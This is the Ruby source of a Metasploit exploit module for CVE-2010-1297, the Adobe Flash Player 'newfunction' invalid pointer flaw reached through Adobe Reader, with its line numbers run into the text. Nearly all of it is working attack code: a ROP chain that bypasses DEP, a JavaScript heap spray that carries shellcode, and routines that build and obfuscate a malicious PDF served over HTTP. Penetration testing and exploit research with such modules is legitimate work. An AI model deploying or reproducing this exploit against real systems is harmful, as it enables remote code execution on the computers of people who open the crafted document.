Path: blob/master/modules/exploits/windows/browser/adobe_flashplayer_newfunction.rb
19934 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45require 'zlib'67class MetasploitModule < Msf::Exploit::Remote8Rank = NormalRanking910include Msf::Exploit::Remote::HttpServer::HTML1112def initialize(info = {})13super(14update_info(15info,16'Name' => 'Adobe Flash Player "newfunction" Invalid Pointer Use',17'Description' => %q{18This module exploits a vulnerability in the DoABC tag handling within19versions 9.x and 10.0 of Adobe Flash Player. Adobe Reader and Acrobat are also20vulnerable, as are any other applications that may embed Flash player.2122Arbitrary code execution is achieved by embedding a specially crafted Flash23movie into a PDF document. An AcroJS heap spray is used in order to ensure24that the memory used by the invalid pointer issue is controlled.2526NOTE: This module uses a similar DEP bypass method to that used within the27adobe_libtiff module. This method is unlikely to work across various28Windows versions due a hardcoded syscall number.29},30'License' => MSF_LICENSE,31'Author' => [32'Unknown', # Found being openly exploited33'jduck' # Metasploit version34],35'References' => [36['CVE', '2010-1297'],37['OSVDB', '65141'],38['BID', '40586'],39['URL', 'http://www.adobe.com/support/security/advisories/apsa10-01.html'],40# For SWF->PDF embedding41['URL', 'http://feliam.wordpress.com/2010/02/11/flash-on-a-pdf-with-minipdf-py/']42],43'DefaultOptions' => {44'EXITFUNC' => 'process',45'HTTP::compression' => 'gzip',46'HTTP::chunked' => true,47'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'48},49'Payload' => {50'Space' => 1000,51'BadChars' => "\x00",52'DisableNops' => true53},54'Platform' => 'win',55'Targets' => [56# Tested OK via Adobe Reader 9.3.0 on Windows XP SP3 (uses flash 10.0.42.34) -jjd57# Tested OK via Adobe Reader 9.3.1 on Windows XP SP3 (uses flash 10.0.45.2) -jjd58# Tested OK via Adobe Reader 9.3.2 on Windows XP SP3 (uses flash 10.0.45.2) -jjd59[ 'Automatic', {}],60],61'DisclosureDate' => '2010-06-04',62'DefaultTarget' => 0,63'Notes' => {64'Reliability' => UNKNOWN_RELIABILITY,65'Stability' => UNKNOWN_STABILITY,66'SideEffects' => UNKNOWN_SIDE_EFFECTS67}68)69)70end7172def exploit73# load the static swf file74path = File.join(Msf::Config.data_directory, "exploits", "CVE-2010-1297.swf")75fd = File.open(path, "rb")76@swf_data = fd.read(fd.stat.size)77fd.close7879super80end8182def on_request_uri(cli, request)83print_status("Sending crafted PDF w/SWF")8485js_data = make_js(regenerate_payload(cli).encoded)86pdf_data = make_pdf(@swf_data, js_data)87send_response(cli, pdf_data, { 'Content-Type' => 'application/pdf', 'Pragma' => 'no-cache' })8889# Handle the payload90handler(cli)91end9293def make_js(encoded_payload)94# The following executes a ret2lib using BIB.dll95# The effect is to bypass DEP and execute the shellcode in an indirect way96stack_data = [970xc0c0c0c,980x7004919, # pop ecx / pop ecx / mov [eax+0xc0],1 / pop esi / pop ebx / ret990xcccccccc,1000x70048ef, # xchg eax,esp / ret1010x700156f, # mov eax,[ecx+0x34] / push [ecx+0x24] / call [eax+8]1020xcccccccc,1030x7009084, # ret1040x7009084, # ret1050x7009084, # ret1060x7009084, # ret1070x7009084, # ret1080x7009084, # ret1090x7009033, # ret 0x181100x7009084, # ret1110xc0c0c0c,1120x7009084, # ret1130x7009084, # ret1140x7009084, # ret1150x7009084, # ret1160x7009084, # ret1170x7009084, # ret1180x7009084, # ret1190x7009084, # ret1200x7001599, # pop ebp / ret1210x10124,1220x70072f7, # pop eax / ret1230x10104,1240x70015bb, # pop ecx / ret1250x1000,1260x700154d, # mov [eax], ecx / ret1270x70015bb, # pop ecx / ret1280x7ffe0300, # -- location of KiFastSystemCall1290x7007fb2, # mov eax, [ecx] / ret1300x70015bb, # pop ecx / ret1310x10011,1320x700a8ac, # mov [ecx], eax / xor eax,eax / ret1330x70015bb, # pop ecx / ret1340x10100,1350x700a8ac, # mov [ecx], eax / xor eax,eax / ret1360x70072f7, # pop eax / ret1370x10011,1380x70052e2, # call [eax] / ret -- (KiFastSystemCall - VirtualAlloc?)1390x7005c54, # pop esi / add esp,0x14 / ret1400xffffffff,1410x10100,1420x0,1430x10104,1440x1000,1450x40,146# The next bit effectively copies data from the interleaved stack to the memory147# pointed to by eax148# The data copied is:149# \x5a\x90\x54\x90\x5a\xeb\x15\x58\x8b\x1a\x89\x18\x83\xc0\x04\x83150# \xc2\x04\x81\xfb\x0c\x0c\x0c\x0c\x75\xee\xeb\x05\xe8\xe6\xff\xff151# \xff\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xff\xff\xff\x901520x700d731, # mov eax, [ebp-0x24] / ret1530x70015bb, # pop ecx / ret1540x9054905a,1550x700154d, # mov [eax], ecx / ret1560x700a722, # add eax, 4 / ret1570x70015bb, # pop ecx / ret1580x5815eb5a,1590x700154d, # mov [eax], ecx / ret1600x700a722, # add eax, 4 / ret1610x70015bb, # pop ecx / ret1620x18891a8b,1630x700154d, # mov [eax], ecx / ret1640x700a722, # add eax, 4 / ret1650x70015bb, # pop ecx / ret1660x8304c083,1670x700154d, # mov [eax], ecx / ret1680x700a722, # add eax, 4 / ret1690x70015bb, # pop ecx / ret1700xfb8104c2,1710x700154d, # mov [eax], ecx / ret1720x700a722, # add eax, 4 / ret1730x70015bb, # pop ecx / ret1740xc0c0c0c,1750x700154d, # mov [eax], ecx / ret1760x700a722, # add eax, 4 / ret1770x70015bb, # pop ecx / ret1780x5ebee75,1790x700154d, # mov [eax], ecx / ret1800x700a722, # add eax, 4 / ret1810x70015bb, # pop ecx / ret1820xffffe6e8,1830x700154d, # mov [eax], ecx / ret1840x700a722, # add eax, 4 / ret1850x70015bb, # pop ecx / ret1860x909090ff,1870x700154d, # mov [eax], ecx / ret1880x700a722, # add eax, 4 / ret1890x70015bb, # pop ecx / ret1900x90909090,1910x700154d, # mov [eax], ecx / ret1920x700a722, # add eax, 4 / ret1930x70015bb, # pop ecx / ret1940x90909090,1950x700154d, # mov [eax], ecx / ret1960x700a722, # add eax, 4 / ret1970x70015bb, # pop ecx / ret1980x90ffffff,1990x700154d, # mov [eax], ecx / ret2000x700d731, # mov eax, [ebp-0x24] / ret2010x700112f # call eax -- (execute stub to transition to full shellcode)202].pack('V*')203204var_unescape = rand_text_alpha(rand(100) + 1)205var_shellcode = rand_text_alpha(rand(100) + 1)206207var_start = rand_text_alpha(rand(100) + 1)208209var_s = 0x10000210var_c = rand_text_alpha(rand(100) + 1)211var_b = rand_text_alpha(rand(100) + 1)212var_d = rand_text_alpha(rand(100) + 1)213var_3 = rand_text_alpha(rand(100) + 1)214var_i = rand_text_alpha(rand(100) + 1)215var_4 = rand_text_alpha(rand(100) + 1)216217payload_buf = ''218payload_buf << stack_data219payload_buf << encoded_payload220221escaped_payload = Rex::Text.to_unescape(payload_buf)222223js = %Q|224var #{var_unescape} = unescape;225var #{var_shellcode} = #{var_unescape}( '#{escaped_payload}' );226var #{var_c} = #{var_unescape}( "%" + "u" + "0" + "c" + "0" + "c" + "%u" + "0" + "c" + "0" + "c" );227while (#{var_c}.length + 20 + 8 < #{var_s}) #{var_c}+=#{var_c};228#{var_b} = #{var_c}.substring(0, (0x0c0c-0x24)/2);229#{var_b} += #{var_shellcode};230#{var_b} += #{var_c};231#{var_d} = #{var_b}.substring(0, #{var_s}/2);232while(#{var_d}.length < 0x80000) #{var_d} += #{var_d};233#{var_3} = #{var_d}.substring(0, 0x80000 - (0x1020-0x08) / 2);234var #{var_4} = new Array();235for (#{var_i}=0;#{var_i}<0x1f0;#{var_i}++) #{var_4}[#{var_i}]=#{var_3}+"s";236|237238js239end240241def random_non_ascii_string(count)242result = ""243count.times do244result << (rand(128) + 128).chr245end246result247end248249def io_def(id)250"%d 0 obj\n" % id251end252253def io_ref(id)254"%d 0 R" % id255end256257# http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/258def n_obfu(str)259result = ""260str.scan(/./u) do |c|261if rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z'262result << "#%x" % c.unpack("C*")[0]263else264result << c265end266end267result268end269270def ascii_hex_whitespace_encode(str)271result = ""272whitespace = ""273str.each_byte do |b|274result << whitespace << "%02x" % b275whitespace = " " * (rand(3) + 1)276end277result << ">"278end279280def make_pdf(swf, js)281swf_name = rand_text_alpha(8 + rand(8)) + ".swf"282283xref = []284eol = "\n"285endobj = "endobj" << eol286287# Randomize PDF version?288pdf = "%PDF-1.5" << eol289# pdf << "%" << random_non_ascii_string(4) << eol290291# catalog292xref << pdf.length293pdf << io_def(1) << n_obfu("<</Type/Catalog")294pdf << n_obfu("/Pages ") << io_ref(3)295pdf << n_obfu("/OpenAction ") << io_ref(5)296pdf << n_obfu(">>")297pdf << eol << endobj298299# pages array300xref << pdf.length301pdf << io_def(3) << n_obfu("<</Type/Pages/Count 1/Kids [") << io_ref(4) << n_obfu("]>>") << eol << endobj302303# page 1304xref << pdf.length305pdf << io_def(4) << n_obfu("<</Type/Page/Parent ") << io_ref(3)306pdf << n_obfu("/Annots [") << io_ref(7) << n_obfu("] ")307pdf << n_obfu(">>")308pdf << eol << endobj309310# js action311xref << pdf.length312pdf << io_def(5) << n_obfu("<</Type/Action/S/JavaScript/JS ") + io_ref(6) + ">>" << eol << endobj313314# js stream315xref << pdf.length316compressed = Zlib::Deflate.deflate(ascii_hex_whitespace_encode(js))317pdf << io_def(6) << n_obfu("<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>" % compressed.length) << eol318pdf << "stream" << eol319pdf << compressed << eol320pdf << "endstream" << eol321pdf << endobj322323# swf annotation object324xref << pdf.length325pdf << io_def(7) << n_obfu("<</Type/Annot/Subtype/RichMedia")326pdf << n_obfu("/Rect [20 20 187 69] ")327pdf << n_obfu("/RichMediaSettings ") << io_ref(8)328pdf << n_obfu("/RichMediaContent ") << io_ref(9)329pdf << n_obfu("/NM (") << swf_name << n_obfu(")")330pdf << n_obfu(">>")331pdf << eol << endobj332333# rich media settings334xref << pdf.length335pdf << io_def(8)336pdf << n_obfu("<</Type/RichMediaSettings/Subtype/Flash")337pdf << n_obfu("/Activation ") << io_ref(10)338pdf << n_obfu("/Deactivation ") << io_ref(11)339pdf << n_obfu(">>")340pdf << eol << endobj341342# rich media content343xref << pdf.length344pdf << io_def(9)345pdf << n_obfu("<</Type/RichMediaContent")346pdf << n_obfu("/Assets ") << io_ref(12)347pdf << n_obfu("/Configurations [") << io_ref(14) << "]"348pdf << n_obfu(">>")349pdf << eol << endobj350351# rich media activation / deactivation352xref << pdf.length353pdf << io_def(10)354pdf << n_obfu("<</Type/RichMediaActivation/Condition/PO>>")355pdf << eol << endobj356357xref << pdf.length358pdf << io_def(11)359pdf << n_obfu("<</Type/RichMediaDeactivation/Condition/XD>>")360pdf << eol << endobj361362# rich media assets363xref << pdf.length364pdf << io_def(12)365pdf << n_obfu("<</Names [(#{swf_name}) ") << io_ref(13) << n_obfu("]>>")366pdf << eol << endobj367368# swf embeded file ref369xref << pdf.length370pdf << io_def(13)371pdf << n_obfu("<</Type/Filespec /EF <</F ") << io_ref(16) << n_obfu(">> /F(#{swf_name})>>")372pdf << eol << endobj373374# rich media configuration375xref << pdf.length376pdf << io_def(14)377pdf << n_obfu("<</Type/RichMediaConfiguration/Subtype/Flash")378pdf << n_obfu("/Instances [") << io_ref(15) << n_obfu("]>>")379pdf << eol << endobj380381# rich media isntance382xref << pdf.length383pdf << io_def(15)384pdf << n_obfu("<</Type/RichMediaInstance/Subtype/Flash")385pdf << n_obfu("/Asset ") << io_ref(13)386pdf << n_obfu(">>")387pdf << eol << endobj388389# swf stream390# NOTE: This data is already compressed, no need to compress it again...391xref << pdf.length392pdf << io_def(16) << n_obfu("<</Type/EmbeddedFile/Length %s>>" % swf.length) << eol393pdf << "stream" << eol394pdf << swf << eol395pdf << "endstream" << eol396pdf << endobj397398# trailing stuff399xrefPosition = pdf.length400pdf << "xref" << eol401pdf << "0 %d" % (xref.length + 1) << eol402pdf << "0000000000 65535 f" << eol403xref.each do |index|404pdf << "%010d 00000 n" % index << eol405end406407pdf << "trailer" << eol408pdf << n_obfu("<</Size %d/Root " % (xref.length + 1)) << io_ref(1) << ">>" << eol409410pdf << "startxref" << eol411pdf << xrefPosition.to_s() << eol412413pdf << "%%EOF" << eol414415end416end417418419